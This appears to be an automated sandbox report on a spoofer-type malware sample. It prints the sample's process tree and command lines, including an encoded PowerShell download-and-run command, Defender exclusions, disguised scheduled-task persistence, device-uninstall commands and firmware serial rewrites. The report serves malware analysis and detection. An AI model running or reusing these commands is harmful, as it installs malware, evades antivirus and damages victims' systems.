Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeLoadDriverPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeLoadDriverPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1572 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1572 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4708 wrote to memory of 1324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
PID 4708 wrote to memory of 1324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
PID 4708 wrote to memory of 2632 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe
PID 4708 wrote to memory of 2632 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe
PID 4708 wrote to memory of 2632 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe
PID 4708 wrote to memory of 1672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\conhostsft.exe
PID 4708 wrote to memory of 1672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\conhostsft.exe
PID 4708 wrote to memory of 1672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\conhostsft.exe
PID 1324 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\System32\cmd.exe
PID 1324 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\System32\cmd.exe
PID 2632 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe C:\Windows\SysWOW64\WScript.exe
PID 2632 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe C:\Windows\SysWOW64\WScript.exe
PID 2632 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe C:\Windows\SysWOW64\WScript.exe
PID 3396 wrote to memory of 3456 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\Volumeid64.exe
PID 3396 wrote to memory of 3456 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\Volumeid64.exe
PID 1324 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\System32\cmd.exe
PID 1324 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\System32\cmd.exe
PID 1272 wrote to memory of 2444 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 2444 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 4424 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 4424 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 1276 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 1276 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 1912 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 1912 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 1156 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 1156 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 3084 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 3084 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 3424 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 3424 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 3732 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 3732 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 3140 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wusa.exe
PID 1272 wrote to memory of 3140 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wusa.exe
PID 1272 wrote to memory of 1976 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 1976 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 1540 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 1540 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 1340 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 1340 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 2760 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 2760 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 4984 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe
PID 1272 wrote to memory of 4984 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe
PID 1272 wrote to memory of 2824 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 2824 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 2688 wrote to memory of 3256 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\System32\Conhost.exe
PID 2688 wrote to memory of 3256 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\System32\Conhost.exe
PID 2688 wrote to memory of 3256 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\System32\Conhost.exe
PID 3256 wrote to memory of 3556 N/A C:\Windows\SysWOW64\cmd.exe C:\ChainReview\sphyperRuntimedhcpSvc.exe
PID 3256 wrote to memory of 3556 N/A C:\Windows\SysWOW64\cmd.exe C:\ChainReview\sphyperRuntimedhcpSvc.exe
PID 1672 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Roaming\conhostsft.exe C:\Users\Admin\AppData\Roaming\.conhostsft.exe
PID 1672 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Roaming\conhostsft.exe C:\Users\Admin\AppData\Roaming\.conhostsft.exe
PID 1324 wrote to memory of 4676 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
PID 1324 wrote to memory of 4676 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
PID 4676 wrote to memory of 3652 N/A C:\Windows\system32\cmd.exe C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
PID 4676 wrote to memory of 3652 N/A C:\Windows\system32\cmd.exe C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
PID 1324 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\system32\cmd.exe
PID 1324 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\system32\cmd.exe
PID 1968 wrote to memory of 1984 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Conhost.exe
PID 1968 wrote to memory of 1984 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Conhost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe

"C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAeQB0ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaQB0AHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBjAHIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAGwAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBIAHAAcwByAFMAcABvAG8AZgAuAGUAeABlACcALAAgADwAIwByAHYAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGQAcwBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHMAdwB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEgAcABzAHIAUwBwAG8AbwBmAC4AZQB4AGUAJwApACkAPAAjAHYAegB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwByAGUAbQBvAHQAZQAvAHMAcABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwAsACAAPAAjAG4AZgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeQB3AGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcQBnAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBwAGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAKQA8ACMAdwBnAG0AIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAG0ALwBjAG8AbgBoAG8AcwB0AHMAZgB0AC4AZQB4AGUAJwAsACAAPAAjAGcAYwB6ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagB2AHEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdABmAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBvAG4AaABvAHMAdABzAGYAdAAuAGUAeABlACcAKQApADwAIwBnAHgAZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBhAGYAcwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeQB3AHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcASABwAHMAcgBTAHAAbwBvAGYALgBlAHgAZQAnACkAPAAjAGgAaAB4ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGcAZgB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB3AGUAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBzAHAAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcAKQA8ACMAeAB2AGwAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZwBkAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAZQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGMAbwBuAGgAbwBzAHQAcwBmAHQALgBlAHgAZQAnACkAPAAjAGsAYwBwACMAPgA="

C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe

"C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"

C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe

"C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe"

C:\Users\Admin\AppData\Roaming\conhostsft.exe

"C:\Users\Admin\AppData\Roaming\conhostsft.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: L59I-K5JS

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\ChainReview\4N7V2tIOe7KSQ8eET3YGuCyK2Y.vbe"

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: L59I-K5JS

C:\Users\Admin\AppData\Roaming\.conhostsft.exe

"C:\Users\Admin\AppData\Roaming\.conhostsft.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ChainReview\8xoM57ln5l3nWVEqwKA0TDOQ0Am35EOuQMtKP.bat" "

C:\ChainReview\sphyperRuntimedhcpSvc.exe

"C:\ChainReview/sphyperRuntimedhcpSvc.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 13740HP-TRGT23541AB

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Common Files\DESIGNER\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Common Files\DESIGNER\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Common Files\DESIGNER\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 213743HP-TRGT1522RV

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Common Files\SearchApp.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\SearchApp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Common Files\SearchApp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 11 /tr "'C:\Windows\ja-JP\fontdrvhost.exe'" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 813743HP-TRGT1522SG

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\ja-JP\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Windows\ja-JP\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Windows\en-US\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\en-US\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Windows\en-US\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 14 /tr "'C:\Program Files\Reference Assemblies\Microsoft\SppExtComObj.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\SppExtComObj.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 7 /tr "'C:\Program Files\Reference Assemblies\Microsoft\SppExtComObj.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\DESIGNER\csrss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Common Files\SearchApp.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ja-JP\fontdrvhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\en-US\conhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\SppExtComObj.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\KnrOHCCDDZ.bat"

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 513743HP-TRGT1522SL

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 413747HP-TRGT12270FA

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 613747HP-TRGT12270FU

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 313747HP-TRGT12270DQ

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 713747HP-TRGT12270MST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 13766HP-TRGT11225AB

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 213766HP-TRGT11225RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\Windows\System32\cmd.exe

